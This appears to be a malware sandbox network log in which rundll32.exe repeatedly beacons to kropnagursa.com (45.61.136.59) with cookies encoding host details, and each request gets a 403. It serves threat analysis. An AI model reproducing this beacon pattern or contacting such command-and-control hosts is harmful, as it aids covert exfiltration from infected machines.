                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:31 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            53192.168.2.44974945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:32.011923075 CET2176OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:32.177014112 CET2176INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:32 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            54192.168.2.44975045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:32.620711088 CET2177OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:32.788597107 CET2178INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:32 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            55192.168.2.44975145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:33.241126060 CET2178OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:33.406014919 CET2179INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:33 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            56192.168.2.44975245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:33.814574957 CET2180OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:33.988701105 CET2180INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:33 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            57192.168.2.44975345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:34.477274895 CET2181OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:34.642596960 CET2181INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:34 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            58192.168.2.44975445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:34.965503931 CET2182OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:35.130418062 CET2183INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            59192.168.2.44975545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:35.469707012 CET2183OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:35.634614944 CET2184INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            6192.168.2.44970245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:00.614211082 CET2115OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:00.781061888 CET2116INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:00 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            60192.168.2.44975645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:35.956223011 CET2185OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:36.120845079 CET2185INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:36 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            61192.168.2.44975745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:36.706903934 CET2186OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:36.871592045 CET2186INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:36 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            62192.168.2.44975845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:37.197788954 CET2187OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:37.362535954 CET2188INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:37 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            63192.168.2.44975945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:37.803857088 CET2189OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:37.968604088 CET2189INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:37 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            64192.168.2.44976045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:38.337613106 CET2190OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:38.502934933 CET2190INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:38 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            65192.168.2.44976145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:39.258378983 CET2191OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:39.426423073 CET2192INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            66192.168.2.44976245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:39.910600901 CET2193OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:40.075313091 CET2193INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            67192.168.2.44976345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
